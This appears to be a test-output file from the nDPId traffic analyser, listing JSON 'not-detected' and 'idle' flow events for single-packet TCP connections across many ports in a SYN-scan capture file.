-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8181,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8181,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
